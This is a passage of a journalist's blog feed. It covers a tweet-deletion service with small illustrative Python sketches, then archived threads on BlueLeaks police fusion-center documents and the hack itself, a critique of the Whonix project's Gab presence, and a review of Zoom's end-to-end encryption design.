<p>This algorithm is prone to false positives, of course. Many perfectly reasonable people have at one point liked a Trump tweet, for whatever reason. So if you get blocked and you've only liked a few fascist tweets, Semiphemeral will let you unblock yourself and continue using the service. But if you've demonstrated a clear pattern of liking what fascists are spewing on Twitter, you have to write an email if you want to appeal your block.</p>
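<p>The tiered policy above amounts to a simple threshold check. This is a hedged sketch, not Semiphemeral's real code; the cutoff of three likes is a made-up number for illustration:</p>

```python
def moderation_action(fascist_likes_recent, self_unblock_threshold=3):
    """Tiered response based on recent likes of tweets from listed accounts.

    The threshold value is hypothetical, not Semiphemeral's actual number."""
    if fascist_likes_recent == 0:
        return "allowed"
    if fascist_likes_recent <= self_unblock_threshold:
        return "blocked, may self-unblock"
    return "blocked, must appeal by email"

print(moderation_action(0))   # allowed
print(moderation_action(2))   # blocked, may self-unblock
print(moderation_action(10))  # blocked, must appeal by email
```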
<h1 id="getting-started">Getting started</h1><p>Using the hosted Semiphemeral service is easy. Just go to <a href="https://semiphemeral.com/">https://semiphemeral.com/</a> and click "Login with Twitter". This will ask you to give Semiphemeral.com permission to delete your tweets and likes.</p>
<p><img src="twitter-auth.png" alt=""></p>
<p>As soon as you create your account, Semiphemeral starts downloading a history of your tweets. Depending on how long you've been using Twitter, this may take a long time. Twitter enforces <a href="https://developer.twitter.com/ja/docs/basics/rate-limits">rate limits</a>, which means Semiphemeral will frequently have to stop and wait 15 minutes before it can continue.</p>
<p>In the meantime, you can go over to the Settings page and configure it exactly as you like. Here's how mine is configured:</p>
<ul>
<li>Delete tweets older than 30 days unless they have at least 20 retweets or at least 20 likes, and don't delete tweets that are part of a thread that contains at least one tweet that meets these thresholds</li>
<li>Unretweet tweets older than 30 days and unlike tweets older than 60 days</li>
<li>Delete direct messages older than 14 days</li>
</ul>
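<p>The tweet rules in that list can be sketched as a filter. This is an illustration of the logic only, under assumed field names (<code>id</code>, <code>created_at</code>, <code>retweets</code>, <code>likes</code>, <code>thread_id</code> are not Semiphemeral's real schema): a tweet survives if it's recent, popular enough, or in a thread where any tweet meets the thresholds:</p>

```python
from datetime import datetime, timedelta

def tweets_to_delete(tweets, now, days=30, min_retweets=20, min_likes=20):
    """Return ids of tweets that fail every keep-rule: too old, not popular,
    and not part of a thread containing a popular tweet."""
    cutoff = now - timedelta(days=days)

    def popular(t):
        return t["retweets"] >= min_retweets or t["likes"] >= min_likes

    protected_threads = {t["thread_id"] for t in tweets if popular(t)}
    return [
        t["id"] for t in tweets
        if t["created_at"] < cutoff
        and not popular(t)
        and t["thread_id"] not in protected_threads
    ]

now = datetime(2020, 9, 10)
tweets = [
    {"id": 1, "created_at": datetime(2020, 1, 1), "retweets": 0,  "likes": 2,  "thread_id": "a"},
    {"id": 2, "created_at": datetime(2020, 1, 1), "retweets": 50, "likes": 90, "thread_id": "b"},
    {"id": 3, "created_at": datetime(2020, 1, 2), "retweets": 0,  "likes": 0,  "thread_id": "b"},
    {"id": 4, "created_at": datetime(2020, 9, 1), "retweets": 0,  "likes": 0,  "thread_id": "c"},
]
print(tweets_to_delete(tweets, now))  # [1]  (2 is popular, 3 shares its thread, 4 is recent)
```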
<p><img src="settings-screenshot.png" alt=""></p>
<p>When it's done downloading your Twitter history, @semiphemeral will send you a Twitter direct message letting you know.</p>
<p>The next step is to go to the Tweets tab. This will show you all of the tweets that don't fit your criteria in Settings, and you can optionally exclude any of them from deletion. For example, Semiphemeral won't delete the tweet that verifies my identity on the messaging app Keybase:</p>
<p><img src="keybase-screenshot.png" alt=""></p>
<p>After you've chosen the settings you want and chosen which tweets to manually exclude, you can go back to the Dashboard and click the "Start Semiphemeral" button. From this point on, once a day Semiphemeral will download your latest Twitter history and delete the older stuff based on your settings.</p>
<h1 id="deleting-direct-messages">Deleting direct messages</h1><p>Semiphemeral can also delete your old DMs, basically making them ephemeral (although keep in mind that when you delete a DM, the person you sent it to can still read it unless they delete it too).</p>
<p>When you first log in to Semiphemeral, you give the app permission to delete your tweets, but it doesn't have access to your DMs. If you want it to delete them, first you must give it access. You can find a link to authorize Semiphemeral to access your DMs on the Settings page under "Direct messages". This time you have to approve an additional permission.</p>
<p><img src="twitter-dms-auth.png" alt=""></p>
<p>There's another catch. Twitter only tells Semiphemeral about the last 30 days of your DMs. Because of this, Semiphemeral can't <em>automatically</em> delete all your old DMs, only those within the last 30 days. For example, if you configure it to delete DMs older than 7 days, each time it runs it will delete the DMs between 30 days ago and 7 days ago.</p>
<p>But if you have years and years of DMs you want to destroy, don't worry. You can still bulk delete them, you just need to give Semiphemeral a list of them. If you go to the DMs tab there are instructions on how to do this. But in short, you need to download a copy of your Twitter archive, and then upload the files that contain all of your historical DM metadata to Semiphemeral, and <em>then</em> it can delete all your older ones.</p>
<h1 id="semiphemeral-com-doesn-t-track-you">Semiphemeral.com doesn't track you</h1><p>You can see Semiphemeral's extremely <a href="https://semiphemeral.com/privacy">short and readable privacy policy here</a>, but the TLDR is: The service doesn't use any analytics software or log IP addresses, and there are no ads. It temporarily saves the content of your tweets, but then deletes that content when it deletes those tweets. It never accesses the content of your DMs.</p>
<p>It's hosted on the US-based cloud hosting provider DigitalOcean, and uses Stripe to process optional credit card tips.</p>
<h1 id="paid-for-by-tips">Paid for by tips</h1><p>Semiphemeral is totally free to use. I coded it in my spare time basically just because I wanted to use it myself. At the moment it's costing me roughly $60/month to pay for hosting (and if it gets considerably more popular, that amount will increase as well).</p>
<p>If you <3 Semiphemeral you can help me offset these costs by tipping (you can do this from the Tip tab when you're logged in), which is greatly appreciated.</p>
<h1 id="twitter-thread-ncric">Twitter Thread: Northern California Regional Intelligence Center</h1><p><em>By Micah Lee, posted: 2020-08-17</em></p><p><em>Background: This is an archived Twitter thread. For more information, read: <a href="../../../2023/05/elon-banned-me-from-twitter-for-doing-journalism-good-riddance/">Elon banned me from Twitter for doing journalism. Good riddance.</a></em></p>
<p>Original URL of Twitter thread: <a href="https://twitter.com/micahflee/status/1295382291741540353">https://twitter.com/micahflee/status/1295382291741540353</a></p>
<hr>
<p>I pored through two weeks of docs from the Northern California Regional Intelligence Center (police intelligence agency), from when George Floyd was killed while handcuffed face-down in the street, to when the BlueLeaks hacktivist exfiltrated the data <a href="https://theintercept.com/2020/08/17/blueleaks-california-ncric-black-lives-matter-protesters/">https://theintercept.com/2020/08/17/blueleaks-california-ncric-black-lives-matter-protesters/</a></p>
<p><em>Posted 8:29 AM · Aug 17, 2020, 141 Retweets, 566 Likes</em></p>
<hr>
<p>It turns out, starting May 31 NCRIC's terrorism liaison program began emailing PDFs listing upcoming protests to over 14,400 people, mostly local cops across northern California, twice a day, at 10am and again at 6pm</p>
<p><img src="image1.jpg" alt=""></p>
<p><em>Posted 8:29 AM · Aug 17, 2020, 4 Retweets, 18 Likes</em></p>
<hr>
<p>This PDF listed 46 protests scheduled for June 6 in San Francisco, San Jose, Palo Alto, Berkeley, Oakland, and other cities, and 36 other events for the following days. The vast majority of events were #BlackLivesMatter protests</p>
<p><img src="image2.png" alt=""></p>
<p><em>Posted 8:29 AM · Aug 17, 2020, 5 Retweets, 16 Likes</em></p>
<hr>
<p>NCRIC's director Mike Sena says that NCRIC no longer sends these twice-daily emails. He says they started after a right-wing extremist killed a guard at Oakland's federal building, and stopped "I believe it was after the suspects were taken into custody" <a href="https://nbcnews.com/news/us-news/airman-charged-killing-federal-officer-during-george-floyd-protests-california-n1231187">https://nbcnews.com/news/us-news/airman-charged-killing-federal-officer-during-george-floyd-protests-california-n1231187</a></p>
<p><em>Posted 8:29 AM · Aug 17, 2020, 4 Retweets, 9 Likes</em></p>
<hr>
<p>"Really what we have here is over-broad collection and dissemination of peoples’ protected First Amendment activity, and it’s untethered to any basis in the law," an @ACLU_NorCal lawyer says. The docs also claim to be exempt from public records requests, which isn't true</p>
<p><img src="image3a.png" alt="">
<img src="image3b.png" alt=""></p>
<p><em>Posted 8:29 AM · Aug 17, 2020, 7 Retweets, 19 Likes</em></p>
<hr>
<p>NCRIC also regularly forwards fear-mongering memos from FBI, DHS, and other feds, containing cherrypicked anecdotes and tweets that make protesters seem scary and dangerous, to these 14k local cops across northern California. Like, consider this tweet</p>
<p><blockquote class="twitter-tweet"><p lang="en" dir="ltr">see a blue lives matter flag, destroy a blue lives matter flag challenge <a href="https://t.co/1IgudD82lK">https://t.co/1IgudD82lK</a></p>— Long Beach Anarchist Collective (@AnarchistLB) <a href="https://twitter.com/AnarchistLB/status/1265780248345370624?ref_src=twsrc%5Etfw">May 27, 2020</a></blockquote></p>
<p><em>Posted 8:29 AM · Aug 17, 2020, 5 Retweets, 12 Likes</em></p>
<hr>
<p>An LA-based FBI analyst saw it and wrote this report called "Civil Unrest in Response to Death of George Floyd Threatens Law Enforcement Supporters’ Safety". NCRIC then forwarded this document to its list of 14k cops</p>
<p><img src="image4.png" alt=""></p>
<p><em>Posted 8:29 AM · Aug 17, 2020, 4 Retweets, 15 Likes</em></p>
<hr>
<p>There's so much more like this too. NCRIC steadily forwarded docs from feds to local cops saying things like this. If cops believe their lives are in danger, this might help explain why their response to peaceful protests has been so brutal and violent</p>
<p><img src="image5a.png" alt="">
<img src="image5b.jpg" alt="">
<img src="image5c.jpg" alt="">
<img src="image5d.jpg" alt=""></p>
<p><em>Posted 8:29 AM · Aug 17, 2020, 6 Retweets, 17 Likes</em></p>
<hr>
<p>Oh yeah, and one of the documents tries to lay blame for the massive nationwide outrage against police killings of Black people on "foreign influence campaigns"</p>
<p><img src="image6.jpg" alt=""></p>
<p><em>Posted 8:29 AM · Aug 17, 2020, 8 Retweets, 14 Likes</em></p>
<hr>
<p>NCRIC was so busy spying on protesters that it had to postpone its class about spying on cell phones</p>
<p><img src="image7a.png" alt="">
<img src="image7b.jpg" alt=""></p>
<p><em>Posted 8:29 AM · Aug 17, 2020, 10 Retweets, 23 Likes</em></p>
<hr>
<p>Local cops across northern California logged into NCRIC and submitted "Suspicious Activity Reports" about local BLM protests, and also requested support monitoring social media related to these protests.</p>
<p>For example take this tweet</p>
<p><blockquote class="twitter-tweet"><p lang="en" dir="ltr">SAN JOSE. PLEASE JOIN US THIS SATURDAY JUNE 6TH AT SJSU WELCOME TO...“THE BLACK AMERICAN EXPERIENCE” <a href="https://t.co/1YihcmXNgl">pic.twitter.com/1YihcmXNgl</a></p>— jaydin donte geer (@jaydingeer) <a href="https://twitter.com/jaydingeer/status/1268045070042689537?ref_src=twsrc%5Etfw">June 3, 2020</a></blockquote></p>
<p><em>Posted 8:29 AM · Aug 17, 2020, 2 Retweets, 9 Likes</em></p>
<hr>
<p>A San Jose State University cop posted a SAR under the category "Radicalization/Extremism" saying, "Possible meeting spot for protest activity at SJSU. [...] Has been seen on Twitter under the name @simonvertugo."</p>
<p><em>Posted 8:29 AM · Aug 17, 2020, 3 Retweets, 11 Likes</em></p>
<hr>
<p>Cops from these agencies posted SARs and support requests about BLM protests:</p>
<ul>
<li>Oakland PD</li>
<li>SFPD</li>
<li>San Benito Co Sheriff</li>
<li>Novato PD</li>
<li>Walnut Creek PD</li>
<li>Sunnyvale Dept of Public Safety</li>
<li>Antioch PD</li>
<li>Fremont PD</li>
<li>Napa PD</li>
<li>Healdsburg PD</li>
<li>Palo Alto PD</li>
<li>Golden Gate Bridge Patrol</li>
<li>Contra Costa College</li>
</ul>
<p><em>Posted: 8:29 AM · Aug 17, 2020, 3 Retweets, 12 Likes</em></p>
<hr>
<p>A group of people wearing black clothes and masks (during a pandemic) were at a gas station in Napa asking about renting vans to drop off in SF. Someone saw them, thought they "looked like a ‘ANTIF[A] or Black Bloc’ group" and it ended up as a SAR</p>
<p><em>Posted 8:29 AM · Aug 17, 2020, 2 Retweets, 7 Likes</em></p>
<hr>
<p>The VAST MAJORITY of SARs related to civil unrest were about BLM protests or suspected antifa activity. But there were a few SARs about fascists too. Like this one, where someone called a gov employee and described his plans to shoot and kill protesters</p>
<p><img src="image8.png" alt=""></p>
<p><em>Posted 8:29 AM · Aug 17, 2020, 3 Retweets, 9 Likes</em></p>
<hr>
<p>There were also two instances of police (from @RedwoodCityPD and @MoragaPolice) requesting help protecting racist white female teenagers against doxing/online harassment they faced after making racist statements and using anti-Black racial slurs</p>
<p><img src="image9a.png" alt="">
<img src="image9b.png" alt=""></p>
<p><em>Posted 8:29 AM · Aug 17, 2020, 4 Retweets, 10 Likes</em></p>
<hr>
<p>BlueLeaks contains SO MUCH evidence of spying on First Amendment protected activities, systemic bias, etc. This was all from NCRIC, but there's also another 150 police/fusion center websites included in the hack. Stay tuned for much more reporting</p>
<p><em>Posted 8:29 AM · Aug 17, 2020, 10 Retweets, 33 Likes</em></p>
<h1 id="twitter-thread-blueleaks">Twitter Thread: The BlueLeaks hack of 251 law enforcement websites exposes personal data of over 700,000 cops</h1><p><em>By Micah Lee, posted: 2020-07-15</em></p><p><em>Background: This is an archived Twitter thread. For more information, read: <a href="../../../2023/05/elon-banned-me-from-twitter-for-doing-journalism-good-riddance/">Elon banned me from Twitter for doing journalism. Good riddance.</a></em></p>
<p>Original URL of Twitter thread: <a href="https://twitter.com/micahflee/status/1283418665212211200">https://twitter.com/micahflee/status/1283418665212211200</a></p>
<hr>
<p>The BlueLeaks hack of 251 law enforcement websites exposes personal data of over 700,000 cops. Here is my analysis of the massive 269gb data set <a href="https://theintercept.com/2020/07/15/blueleaks-anonymous-ddos-law-enforcement-hack/">https://theintercept.com/2020/07/15/blueleaks-anonymous-ddos-law-enforcement-hack/</a></p>
<p><em>Posted 8:10 AM · Jul 15, 2020, 558 Retweets, 1,068 Likes</em></p>
<hr>
<p>The hacked websites were built and hosted by Texas web development firm Netsential. They're written in ASP.NET/VBScript and running on Windows servers. They all run the same custom, insecure CMS, which is likely why they all got hacked with their data exfiltrated</p>
<p><em>Posted 8:14 AM · Jul 15, 2020, 29 Retweets, 155 Likes</em></p>
<hr>
<p>The hacked websites are mostly for "fusion centers" designed to share intelligence between feds and state and local cops. Many are devoted specifically to protecting oil companies, banks, and other industry</p>
<p><img src="image1.png" alt=""></p>
<p><em>Posted 8:16 AM · Jul 15, 2020, 54 Retweets, 167 Likes</em></p>
<hr>
<p>Here is an anecdote I discovered in the data, among hundreds of thousands of others. A week after George Floyd's murder, a student in Oregon contacted law firms asking for consent to add them to a list of pro bono legal resources for protesters</p>
<p><img src="image2.png" alt=""></p>
<p><em>Posted 8:24 AM · Jul 15, 2020, 148 Retweets, 393 Likes</em></p>
<hr>
<p>A Bay Area lawyer who received this message was pissed. He mailed this anonymous, unhinged, all-caps rant to the Marin County DA -- "CANNOT RISK THIS PIECE OF SHIT ANTIFA [...] FILING A BAR COMPLAINT AGAINST ME". He ended it with "HAPPY HUNTING"</p>
<p><img src="image3.png" alt=""></p>
<p><em>Posted 8:24 AM · Jul 15, 2020, 96 Retweets, 371 Likes</em></p>
<hr>
<p>An investigator at the DA's office must have thought that this was useful intelligence. She uploaded a scan of the letter to the Northern California Regional Intelligence Center (one of the hacked fusion centers) as a "Suspicious Activity Report"</p>
<p><em>Posted 8:24 AM · Jul 15, 2020, 39 Retweets, 282 Likes</em></p>
<hr>
<p>Under category she put "Radicalization/Extremism", and under Subject she put the Oregon student's name, writing that the student "appears to be a member of the Antifa group and is assisting in planning protesting efforts in the Bay Area despite living in Oregon"</p>
<p><em>Posted 8:24 AM · Jul 15, 2020, 46 Retweets, 303 Likes</em></p>
<hr>
<p>The unhinged Bay Area lawyer apparently isn't suspected of radicalization/extremism (even though he's clearly a right-wing extremist), but the polite college student is.</p>
<p>The return address on the envelope is the SF DA's office -- we couldn't confirm if the lawyer works with them</p>
<p><img src="image4.png" alt=""></p>
<p><em>Posted 8:26 AM · Jul 15, 2020, 76 Retweets, 523 Likes</em></p>
<h1 id="problematic-behavior-whonix">Problematic behavior from the Whonix project</h1><p><em>By Micah Lee, posted: 2020-06-22</em></p><p><strong>April 5, 2022: There is an update at the bottom of the post.</strong></p>
<p><em>Content warning: This blog post mentions sexual assault and anti-Semitic terrorism.</em></p>
<p>The first sign that something weird was going on with the <a href="https://www.whonix.org/">Whonix</a> project -- software, run primarily by Patrick Schleizer and integrated into the <a href="https://www.qubes-os.org/">Qubes</a> operating system, that lets you run anonymous VMs which force all your internet traffic through the <a href="https://www.torproject.org/">Tor network</a> -- came in September 2018, when the project's official Twitter account <a href="https://archive.is/spckm">tweeted</a>, "We miss Jacob Appelbaum."</p>
<p><img src="whonix-tweet.png" alt=""></p>
<p>Jacob Appelbaum is a serial rapist who, in 2016, was kicked out of Tor Project and the internet freedom community after a group of his victims <a href="https://www.theguardian.com/technology/2016/oct/11/jacob-appelbaum-tor-project-sexual-assault-allegations">organized to expose him</a>. The link in the Whonix tweet was to a copy of Citizenfour, Laura Poitras's 2014 documentary about Edward Snowden, which featured Appelbaum before he was exposed as a sexual predator.</p>
<p>Whonix promptly <a href="https://twitter.com/Whonix/status/1041600435478573056">deleted</a> the tweet, and the issue was largely forgotten.</p>
<p>Then earlier this year someone <a href="https://social.linux.pizza/@syster/103815604895181197">reached out to me</a> on Mastodon, the open source federated social network, to point out that the Whonix project has an account on Gab.</p>
<p><img src="whonix-fediverse.png" alt=""></p>
<p>Gab is a white supremacist social network which was founded in 2016 as an alt-right cesspool but really gained infamy in 2018, after it came out that Robert Bowers, the neo-Nazi who murdered 11 people in a terrorist attack at a synagogue in Pittsburgh, was an <a href="https://www.usatoday.com/story/tech/nation-now/2018/10/29/gab-goes-offline-pittsburgh-synagogue-shooting/1804582002/">avid user</a>.</p>
<p>Until today, I was featured on the front page of the Whonix website (quoting an <a href="https://theintercept.com/2015/09/16/getting-hacked-doesnt-bad/">article I wrote</a> for the Intercept about VMs), along with Snowden and quotes from a bunch of organizations that I think might not be happy associating with Whonix if they knew about the project's apparent fascist sympathies.</p>
<p><img src="whonix-homepage.png" alt=""></p>
<p><em>Screenshot from the whonix.org homepage</em></p>
<p>And the footer of every page on the Whonix wiki, which is the majority of whonix.org, has a prominent link to Gab.</p>
<p><img src="whonix-footer.png" alt=""></p>
<p><em>Screenshot from the footer of the Whonix wiki</em></p>
<p>After reading that toot (in Mastodon, tweets are called "toots") I meant to contact Patrick Schleizer and ask him what's going on with Whonix's Gab profile and see if he has an explanation, but I got busy and forgot about it until a few months later.</p>
<p>Last month, Nina Alter, a user experience designer who works with the Qubes and SecureDrop projects, pinged me on Signal to ask some questions about Whonix. She was working on securing funding to improve Whonix's usability. When I told her about how Whonix has an account on Gab and promotes it in the footer of their website, she was quite naturally disturbed.</p>
<p>Before writing her grant proposal, Nina wanted to get to the bottom of it. She emailed Patrick saying that the affiliation with Gab is a major concern that must be addressed before continuing with the grantwriting, but he never emailed back. Nina did not write the grant proposal.</p>
<p>Miguel Jacq is a freelance system administrator and an <a href="https://onionshare.org/">OnionShare</a> developer who has been doing freelance devops work for the Whonix project for a few years. He was also recently made aware of Whonix's Gab connection, so he contacted Patrick expressing concern that Whonix was associating itself with a neo-Nazi social network, envisaging that it could harm the reputation of the project. Patrick never responded to this concern.</p>
<p>"I find difficulty aligning my own personal ethics regarding the matter, with the merits of participating in what has otherwise been to date an important and rewarding project," Miguel told me. "I don't really believe Patrick holds any extreme right-wing views, so for me it makes no sense to have that presence on Gab. Whonix does really important work, but software is political. It's not fun as a left-wing person to have people approach me saying 'Why are you involved with that project, they seem to endorse Gab'. I can't just ignore that and say the software alone matters."</p>
<p>Earlier this month, Miguel formally <a href="https://rezo.mig5.net/@mig5/104321869006611558">stepped down</a> from working with Whonix.</p>
<p>On June 14, I wrote Patrick an encrypted email myself asking about the project's affiliation with Gab and demanding that they either stop this affiliation or remove my name and photo from the Whonix website:</p>
<blockquote><p>Hey Patrick,</p>
<p>A few people have pointed out to me that the footer on the Whonix wiki includes a social media link to Whonix's Gab profile. Why does Whonix have an account on an explicitly racist, neo-Nazi social network? The people who run Gab don't in any way actually give a shit about "free speech" -- it's just a transparent excuse to be able to grow their fascist movement within liberal democracies, but luckily most people aren't falling for it.</p>
<p>I don't feel comfortable associating with fascists or in any way supporting their movements. Can you delete the Whonix Gab account, which only has 38 followers anyway, and remove the link to Gab from the wiki? Or if you don't want to do that, can you remove my name, photo, and quote from the homepage of whonix.org?</p>
</blockquote>
<p>He never responded to my email. But last week he <a href="https://github.com/Whonix/Whonix-Website/commit/a9f55ce9f2341de27e3cd74326654e7f724156cd">updated the code</a> of the Whonix website to remove my quote, and today he deployed the update, so I'm no longer on the homepage.</p>
<p>I've heard from other people who work in open source digital security tools that they have also contacted Patrick and the Whonix project about this.</p>
<p>Whonix could have possibly had a logical explanation for using and promoting Gab. Like, <a href="https://forums.whonix.org/t/long-wiki-edits-thread/3477/1016">maybe</a> Patrick believed the disingenuous marketing about Gab being a free speech social network rather than an explicitly neo-Nazi one.</p>
<p>But if that were the case, he sure isn't answering anyone's questions. Instead, he's steadfastly refusing to budge or explain himself, despite funders and contractors fleeing the project because they don't want to work with fascists.</p>
<hr>
<h3 id="april-5-2022-update">April 5, 2022 Update</h3><p>After talking with Tempest (@JetBlackCloud on Twitter), I decided to change the title of this blog post from "Is the Whonix project run by fascists?" to "Problematic behavior from the Whonix project" because it's more accurate.</p>
<p>I also wanted to provide some updates:</p>
<p>Whonix removed a link to its Gab account from its website in late 2020. The first version of the Whonix site <a href="https://web.archive.org/web/20201030071636/https://www.whonix.org/wiki/Documentation">captured by the Internet Archive</a> that removed the link to Gab was on October 30, 2020, four months after this post was published. The project still technically has a <a href="https://gab.com/Whonix">Gab account</a> but it hasn't posted since November 20, 2021, while it still consistently posts to its <a href="https://twitter.com/Whonix">Twitter account</a>.</p>
<p>I'm not sure why Whonix decided to stop using Gab, but my guess is for the reason that should have been obvious from the beginning: It makes the project look bad.</p>
<p>According to Tempest, the "We miss Jacob Appelbaum" tweet was posted by a problematic Whonix moderator called <a href="https://forums.whonix.org/u/tnt_bom_bom/activity">TNT_BOM_BOM</a>, which is why the tweet ended with "^TNT". That checks out. TNT also signed some of the posts to Gab. Based on his forum posts, TNT is still an active Whonix community member.</p>
<p>Patrick never responded to me or the people I quoted in this blog post, and as far as I can tell, the Whonix project never really responded to this at all (other than, I guess, eventually stopping using Gab). The closest thing that can be found to a response was in this <a href="https://forums.whonix.org/t/whonix-is-loosing-their-antifacist-supporters/9844">forum thread</a> where the user torjunkie points out some new additions to the wiki:</p>
<ul>
<li>Whonix added an <a href="https://www.whonix.org/wiki/Warning#Unsubstantiated_Conclusions">Unsubstantiated Conclusions</a> section to its wiki that says, "Users must be careful not to draw incorrect conclusions based on the existence of specific Whonix ™ communication channels, community software utilized, applications installed on the platform, or the availability of certain wiki entries."</li>
<li>Whonix added a <a href="https://www.whonix.org/wiki/Official_Online_Profiles#Selection_of_Platforms">Selection of Platforms</a> section to its wiki that says that one of the "non-criteria" for picking a platform to create an account on is "ethical or political considerations," and that creating an account is not an endorsement of that social network.</li>
</ul>
<p>I also never found any technical issues with the Whonix project. It's open source and appears to follow best practices. I don't think the problematic behavior says anything about whether or not it's safe to rely on Whonix. While I think parts of Whonix are a bit over-engineered, I still use it myself inside Qubes.</p>
<p>Gab has changed in the years since then too. It was founded by explicit neo-Nazis as part of the <a href="https://en.wikipedia.org/wiki/Alt-tech">alt-tech</a> movement and grew in the aftermath of the deadly 2017 Charlottesville fascist protest, but now it's home to a more diverse far-right audience including people who aren't explicitly fascist, like MAGA/Stop the Steal/QAnon conspiracy types and anti-vaxxers.</p>
Twitter Thread: Live-tweeting Zoom's E2EE whitepaper2020-05-26T00:00:00ZMicah Leeurn:uuid:cfbbf5a4-9513-37b7-81fe-bd45d76ebf51<p><em>Background: This is an archived Twitter thread. For more information, read: <a href="../../../2023/05/elon-banned-me-from-twitter-for-doing-journalism-good-riddance/">Elon banned me from Twitter for doing journalism. Good riddance.</a></em></p>
<p>Original URL of Twitter thread: <a href="https://twitter.com/micahflee/status/1265407886999482368">https://twitter.com/micahflee/status/1265407886999482368</a></p>
<hr>
<p>I’m sitting outside during quarantine reading Zoom’s new “E2E Encryption for Zoom Meetings” and it’s pretty interesting.</p>
<p>First things I notice: I recognize some of these names, and it uses a Creative Commons license!</p>
<p><img src="image1.jpg" alt=""></p>
<p><em>Posted 3:22 PM · May 26, 2020, 178 Retweets, 410 Likes</em></p>
<hr>
<p>It’s also refreshingly honest about Zoom’s security limitations. A complete 180 compared to before the pandemic when Zoom was basically like “no worries we’re unhackable”</p>
<p><img src="image2.jpg" alt=""></p>
<p><em>Posted 3:22 PM · May 26, 2020, 6 Retweets, 44 Likes</em></p>
<hr>
<p>They include themselves in their threat model now! This is important because as a US company, and a company that operates all over the world (including China), governments can force Zoom (and any company) to spy on their users. The only way to mitigate this threat is real E2EE</p>
<p><img src="image3.jpg" alt=""></p>
<p><em>Posted 3:22 PM · May 26, 2020, 8 Retweets, 52 Likes</em></p>
<hr>
<p>While I’d love it if it were some day in scope, I’m glad they acknowledge that even with E2EE they’re not attempting to protect metadata: who is meeting with who, when, and from where</p>
<p><img src="image4.jpg" alt=""></p>
<p><em>Posted 3:22 PM · May 26, 2020, 23 Likes</em></p>
<hr>
<p>They’re planning on incrementally implementing E2EE in four phases. I like this because it means we’ll be able to have E2EE (albeit imperfect) Zoom meetings sooner.</p>
<p>When using a meeting in E2E mode, everyone will have to use the Zoom app: no web app, dial in, etc</p>
<p><img src="image5.jpg" alt=""></p>
<p><em>Posted 3:26 PM · May 26, 2020, 5 Retweets, 25 Likes</em></p>
<hr>
<p>In phase 1, meetings will be E2EE but you still have to trust Zoom's servers: they could do an active attack to spy on a meeting (like FaceTime or iMessage). But by phase 4, Zoom accounts are basically like Keybase accounts: using existing devices to add new devices</p>
<p><em>Posted 3:28 PM · May 26, 2020, 3 Retweets, 27 Likes</em></p>
<hr>
<p>Phase 1 will have a “meeting security code”. The host can read it out loud, and all participants can compare it, and if it matches for everyone it means there is no MITM attack.</p>
<p>Already, this is better than Webex, which currently supports E2EE but doesn’t let you verify it</p>
<p><img src="image6.jpg" alt=""></p>
<p><em>Posted 3:31 PM · May 26, 2020, 6 Retweets, 33 Likes</em></p>
<hr>
<p>Interesting. “No secret key or unencrypted meeting contents will be provided to Zoom infrastructure servers” except for abuse reporting — seems reasonable</p>
<p><img src="image7.jpg" alt=""></p>
<p><em>Posted 3:33 PM · May 26, 2020, 1 Retweet, 14 Likes</em></p>
<hr>
<p>Describing a bunch of cryptographic algorithms they’re planning to use</p>
<p><img src="image8.jpg" alt=""></p>
<p><em>Posted 3:37 PM · May 26, 2020, 10 Likes</em></p>
<hr>
<p>Every Zoom device generates and stores a long term signing keypair which never leaves that device.</p>
<p>❤️ public key crypto</p>
<p><img src="image9.jpg" alt=""></p>
<p><em>Posted 3:40 PM · May 26, 2020, 2 Retweets, 26 Likes</em></p>
<hr>
<p>Each device has a keypair, but additionally, each time you join a meeting you generate a new ephemeral keypair just for that meeting and sign it with your long-term keypair.</p>
<p>This is what’s used to encrypt the meeting’s symmetric session key for each participant</p>
<p><img src="image10.jpg" alt=""></p>
<p><em>Posted 3:45 PM · May 26, 2020, 1 Retweet, 19 Likes</em></p>
<hr>
<p>As people leave and join the meeting, the shared meeting key gets rekeyed. So if you join for a second, get the key, then leave/get kicked out, you can’t spy on the rest of the meeting (even if you can still observe the network)</p>
<p><img src="image11.jpg" alt=""></p>
<p><em>Posted 3:47 PM · May 26, 2020, 19 Likes</em></p>
<hr>
<p>Nice. When you leave a meeting, your client destroys all ephemeral keys used during the meeting to provide “forward secrecy” — an attacker that records an encrypted meeting can’t later decrypt it after stealing keys from a device</p>
<p><img src="image12.jpg" alt=""></p>
<p><em>Posted 3:51 PM · May 26, 2020, 1 Retweet, 17 Likes</em></p>
<hr>
<p>Ooh, it looks like the meeting security code will be encoded as basically a diceware passphrase.</p>
<p>And “if deep fake technology is a concern” you can verify the meeting is secure out of band, like in a Signal group with all participants</p>
<p><img src="image13.jpg" alt=""></p>
<p><em>Posted 3:55 PM · May 26, 2020, 1 Retweet, 10 Likes</em></p>
<hr>
<p>If people join or leave a meeting, and the meeting gets rekeyed, then everyone has to re-compare the security code. That makes sense</p>
<p><img src="image14.jpg" alt=""></p>
<p><em>Posted 3:59 PM · May 26, 2020, 9 Likes</em></p>
<hr>
<p>Phase 2 is all about identity. Each user makes signed statements when they add new devices and revoke devices, and these statements are part of a signature chain so a malicious server can’t replay or omit any of them</p>
<p><em>Posted 4:06 PM · May 26, 2020, 11 Likes</em></p>
<hr>
<p>There’s also a signature chain full of contact list updates - you keep track of the device keys you notice for everyone you have meetings with, so you can tell if someone joins from an unrecognized (possibly faked) device</p>
<p><img src="image15.jpg" alt=""></p>
<p><em>Posted 4:10 PM · May 26, 2020, 12 Likes</em></p>
<hr>
<p>Phase 3 introduces a transparency tree, similar to Certificate Transparency. It ensures that Zoom tells all users the same info about who has what key — meaning if an insider performs a MITM attack against users, there will be a public auditable evidence trail</p>
<p><em>Posted 4:14 PM · May 26, 2020, 2 Retweets, 12 Likes</em></p>
<hr>
<p>The Zoom Transparency Tree concept is incredibly similar to how Keybase does a good job at multiple device support. You can see Keybase experience making its way into this doc</p>
<p><img src="image16.jpg" alt=""></p>
<p><em>Posted 4:19 PM · May 26, 2020, 1 Retweet, 19 Likes</em></p>
<hr>
<p>Phase 4 introduces “real-time security”, making it so a malicious server simply doesn’t have the ability to add a fake device for a user, and the device needs to be added using an existing device (like by scanning a QR code)</p>
<p><img src="image16.jpg" alt=""></p>
<p><em>Posted 4:22 PM · May 26, 2020, 1 Retweet, 11 Likes</em></p>
<hr>
<p>Hah, the conclusion says this white paper proposes bringing E2EE to Zoom “as that term is best understood by security experts” — clearly this is a reference to my and @yaelwrites’s reporting <a href="https://theintercept.com/2020/03/31/zoom-meeting-encryption/">https://theintercept.com/2020/03/31/zoom-meeting-encryption/</a></p>
